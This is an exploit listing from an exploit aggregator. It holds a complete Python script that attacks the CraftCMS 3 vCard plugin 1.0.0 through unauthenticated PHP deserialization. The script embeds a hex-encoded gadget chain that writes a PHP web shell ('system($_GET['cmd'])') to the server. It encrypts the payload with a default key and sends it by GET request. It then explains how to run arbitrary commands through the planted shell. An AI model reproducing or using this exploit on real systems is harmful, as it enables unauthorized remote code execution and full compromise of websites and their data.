Exploit for Craft CMS 3 vCard 1.0.0 Remote Code Execution

Name: Exploit for Craft CMS 3 vCard 1.0.0 Remote Code Execution
Rating: 5 (142 reviews)
2020-05-20 | CVSS 0.0
## https://sploitus.com/exploit?id=PACKETSTORM:157773
# Exploit Title: CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution  
# Date: 2020-05-18  
# Exploit Author: Wade Guest  
# Vendor Homepage: https://craftcms.com/  
# Software Link: https://plugins.craftcms.com/vcard  
# Vulnerability Details: https://gitlab.com/wguest/craftcms-vcard-exploit  
# Version: 1.0.0  
# Tested on: Ubuntu 19.10 / PHP 7.3.11  
# Description: CraftCMS 3 vCard Plugin 1.0.0 - Deserialization to RCE  
  
#!/usr/bin/env python3  
  
import sys  
import argparse  
import subprocess  
import requests  
  
DEFAULT_PAYLOAD = "613a323a7b693a373b4f3a33313a2247757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a6172223a343a7b733a34313a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720066696c656e616d65223b733a%s3a222e2f%s223b733a35323a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720073746f726553657373696f6e436f6f6b696573223b623a313b733a33363a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a617200636f6f6b696573223b613a313a7b693a303b4f3a32373a2247757a7a6c65487474705c436f6f6b69655c536574436f6f6b6965223a313a7b733a33333a220047757a7a6c65487474705c436f6f6b69655c536574436f6f6b69650064617461223b613a333a7b733a373a2245787069726573223b693a313b733a373a2244697363617264223b623a303b733a353a2256616c7565223b733a36373a223c7072653e3c3f70687020696628697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b202020207d203f3e0a223b7d7d7d733a33393a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a6172007374726963744d6f6465223b4e3b7d693a373b693a373b7d"  
  
def generatePayload(fname):  
fname_hex = str(fname).encode('utf-8').hex()  
fname_len_hex = str(len(fname)+2).encode('utf-8').hex()  
payload = DEFAULT_PAYLOAD % (fname_len_hex,fname_hex)  
return payload  
  
  
def exploitCard(url,payload):  
malicious_url = url + payload.decode()  
r = requests.get(malicious_url,verify=False)  
  
return r.status_code  
  
def encryptPayload(payload,salt):  
phpcomm = """$string=hex2bin("%s");$key = "%s";$key = md5( $key );$iv = substr( md5( $key ), 0, 16);echo rtrim(strtr(base64_encode(openssl_encrypt( $string, "aes128", md5( $key ), true, $iv )),"+/", "-_"), "=");""" % (payload,salt)  
result = subprocess.run(['php','-r',phpcomm],stdout=subprocess.PIPE)  
return result.stdout  
  
  
def main():  
parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin")  
parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=")  
parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'")  
parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'")  
  
if len(sys.argv)<3:  
parser.print_help()  
sys.exit(0)  
  
args = parser.parse_args()  
  
attPayload = generatePayload(args.fname)  
  
serPayload = encryptPayload(attPayload,args.salt)  
if exploitCard(args.url,serPayload) == 500:  
print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n")  
  
  
if __name__ == '__main__':  
main()  
sys.exit(0)